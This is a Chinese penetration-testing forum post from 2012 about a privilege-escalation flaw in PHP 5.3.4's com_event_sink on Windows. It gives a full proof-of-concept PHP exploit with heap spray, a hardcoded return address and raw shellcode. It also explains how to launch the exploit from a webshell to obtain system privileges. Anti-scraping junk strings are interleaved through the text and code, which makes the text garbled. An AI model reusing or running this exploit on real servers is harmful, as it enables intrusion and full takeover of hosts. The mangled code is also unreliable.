找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 PHP 5.3.4(WIN) COM_SINK权限提升漏洞
返回列表 发新帖
查看: 2731|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
4 A( l" u: }. J, K5 D' _  B& b' t
测试方法如下:cmd /c x:\php\php.exe x:\test.php' ?' t# H6 {2 _% Q) O, V
& P. E+ y$ N! x) K0 b2 L7 E3 o
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
* D' @( B2 p0 G7 S3 B/ Q! ~这里是两个测试的截图:
6 ~. {; I+ k. x" t( w5 `
: |; a/ f/ S) ?3 X5 C& F! g% A7 {2 V$ c  m; u

& K% v/ @! v9 G- J7 X" E" [7 ^. V- U9 w6 k# Q6 C2 ~/ l4 z  ?
1 D) C9 e- h3 y9 K& J
成功利用此漏洞的攻击者将获得系统的最高权限
' v& A" ^" x& o$ J% n' D" z: k! ^7 C" P: ~* o( \

1 f# w, }! W" h8 I4 ?
5 z+ j  G2 ?+ F% k: |; \, |9 I( G9 m, u# h* M* ^/ s1 U/ ]

8 i6 ^/ W8 _1 R1 {; w- r# I1 U关于漏洞分析稍后附上。一下是PoC代码:
* k/ [) v5 |) i% ]  d: N: U3 {1 X, Q" L1 H6 ?. X
<?php6 |+ v2 n! K* U* ]* X  u! j
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
+ M9 E/ H4 j. o/ ]" B! z, k//$eip ="\x44\x43\x42\x41";/ y6 J5 v) A% ]6 Z) x  v* z0 q- Y- r9 `
$eip= "\x4b\xe8\x57\x78";& Z' _) h$ l7 |  U( H/ S% a
$eax ="\x80\x01\x8d\x04";) y. S; n' \0 U& ?! t, i
$deodrant="";
) I. Z5 R% D" W% J" F$axespray = str_repeat($eip.$eax,0x80);$ P8 e, z1 Z  u( U
//048d0190) y! \' p4 g, M3 V
echo strlen($axespray);* `; \0 |0 x; x2 A
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
2 b* e& a6 k& Mecho "Silic Group Hacker Army - BlackBap.Org";
  \( |$ s2 J0 @) b! u//19200 ==4B32 4b003 w" Y! H( z! Y
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}) r5 U3 ?  w# p5 \, v
$terminate = "T";! c* g0 l0 o, J. T
$u[] =$deodrant;
8 N" ]1 z$ b7 S1 C$ I4 n. t$r[] =$deodrant.$terminate;+ I! U+ q- c- T; X' F& B
$a[] =$deodrant.$terminate;( z+ J' S* y9 I9 C7 b5 \
$s[] =$deodrant.$terminate;5 u) v5 K# y' h" L. ^" u2 a. }
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
8 c8 h  i& {! r& R3 u+ k$vVar = new VARIANT(0x048d0000+180);
) j3 {7 d; t  V8 ^5 |: U4 w: d. P% ]//弹窗代码(Shellcode)
/ `/ \! S" r. W; x0 G) o$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";) Z& P% D9 h* r0 I$ \& }
$var2 = new VARIANT(0x41414242);
" U9 F7 m. V8 C. m2 y* A2 ?com_event_sink($vVar,$var2,$buffer);
, P4 n& i/ `- y?>
6 D( G4 M% a9 \8 I4 O$ e: {
php, 中国大陆, 最新版

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表